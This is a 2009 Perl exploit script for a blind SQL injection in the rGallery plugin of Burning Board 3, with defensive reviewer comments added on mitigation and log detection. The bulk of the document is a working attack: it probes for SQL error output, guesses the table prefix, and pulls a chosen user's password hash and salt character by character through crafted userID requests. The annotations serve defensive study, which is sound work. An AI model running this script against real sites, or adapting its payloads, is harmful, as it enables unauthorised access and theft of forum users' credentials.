
wbb3-sql.txt

Posted on 24 March 2009

#!/usr/bin/perl -w
# Reviewer annotations (defensive reading of this listing)
#
# Purpose: reads a host, a forum user id and a gallery user id from the
# command line and sends HTTP GET requests (LWP::Simple get) to
#     /index.php?page=RGalleryUserGallery&userID=<value>
# with SQL text appended to the userID value. Each response is checked for
# the string "Keine"; from that yes/no signal the script infers, one
# character at a time, the `password` and `salt` columns of the
# <prefix>user row with the given userid and prints them. This is a
# boolean-based blind SQL injection client.
#
# What the listing implies about the target (the server code is not shown
# here, so this is inference): userID reaches a SQL statement without being
# constrained to an integer, and database error text is returned to the
# visitor.
#
# Mitigation: validate/cast userID as an integer and bind it as a query
# parameter; do not render database errors in responses. If requests of the
# shape below appear in logs, treat the hash and salt of the queried account
# as disclosed.
#
# Detection: access-log entries for page=RGalleryUserGallery whose userID is
# not purely numeric, in particular values containing
# "/**/AND/**/ascii(substring((SELECT", arriving in long runs that differ
# only in the position index and the compared ASCII code. The script sets no
# User-Agent, so whatever LWP::Simple sends by default is what the log shows.
use strict;
use LWP::Simple;
$| = 1;

# Banner text (line breaks were lost in this copy of the listing).
print q { ############################# ## WBB3 Blind SQL-Injector ## #### Exploit in rGallery #### ###### by Rohit Bansal ###### ############################# \ Special greetz to # // # \ www.schap.org # // # ############################# };

# Three positional arguments are required; otherwise print usage and stop.
if (@ARGV < 3) {
    print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] Example: wbb3sploit.pl www.target.com 1 5 ";
    print "[User Gallery UserID] has to be the ID of a User, who has got pictures. Example: www.target.com/index.php?page=RGalleryUserGallery&userID=5 ";
    exit;
}

my $url = shift;
my $uid = shift;
my $galid = shift;
my $prefix;
# Candidate characters: the sixteen lowercase hexadecimal digits.
my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

# Probe: a single quote is sent as userID and the response is searched for
# "Fatal error" or "Invalid SQL" (case-insensitive). The check depends on
# the application echoing SQL errors; hiding them removes this signal but
# not the underlying injection.
print "~ Is it vulnerable?... ";
my $chreq = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID='");
if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) {
    print "Nice, seems to be vulnerable! ";
} else {
    print "Seems to be patched, sorry ";
    exit;
}

# Table-prefix step: when the error page contains "_wcf" the prefix is taken
# from the regex match variable, otherwise "wcf1_" is assumed. Error pages
# that echo the failing query are what make this step possible.
print "~ Checking Prefix... ";
if ($chreq =~ m/_wcf/i) {
    print "~ Found Prefix '$1' ";
    $prefix = $1;
} else {
    print "~ Can't find prefix, using 'wcf1_' ";
    $prefix = "wcf1_";
}

# The next string literal spans two lines in the listing; kept as is.
print "~ Exploiting... 
";
print "~^~ Hash: ";
my $counter = 1;
my $countersalt = 1;

# Password column, positions 1..40. Forty positions over a hex-only charset
# is consistent with a 40-character hex digest (presumably SHA-1; the
# listing does not say).
while($counter < 41) {
    # Extra request with a comparison against -1; the result is stored but
    # not read again in this listing.
    my $false_result = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1");
    foreach(@charset) {
        my $ascode = ord($_);
        # One GET per candidate: the appended condition compares the ASCII
        # code of the character at position $counter with $ascode.
        my $result = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");
        if (length($result) != 0) {
            # A non-empty page without "Keine" is taken as "condition true".
            # "Keine" is presumably part of the gallery's German
            # "no pictures" message; confirm against the application.
            if ($result =~ "Keine") { } else{
                print chr($ascode);
                # Advanced inside the charset loop, so the rest of this pass
                # is compared against the next position.
                $counter++;
            }
        }
    }
}

# Salt column: first a single request asking whether position 1 has an ASCII
# code above 0; the salt loop runs only if that page lacks "Keine".
my $saltcheck = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if($saltcheck =~ "Keine") { } else {
    print " ~^~ Salt: ";
    # Same per-character procedure as above, for positions 1..39 of `salt`.
    while($countersalt < 40) {
        # Stored but not read again in this listing.
        my $false_result_salt = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=-1");
        foreach(@charset) {
            my $ascodesalt = ord($_);
            my $resultsalt = get("http:// ".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");
            if (length($resultsalt) != 0) {
                if ($resultsalt =~ "Keine") { } else{
                    print chr($ascodesalt);
                    $countersalt++;
                }
            }
        }
    }
}
print " ~ Done! Exploit by Rohit Bansal ";
# Author sign-off from the original post (plain text, not part of the script):
Regards Rohit bansal schap team

 
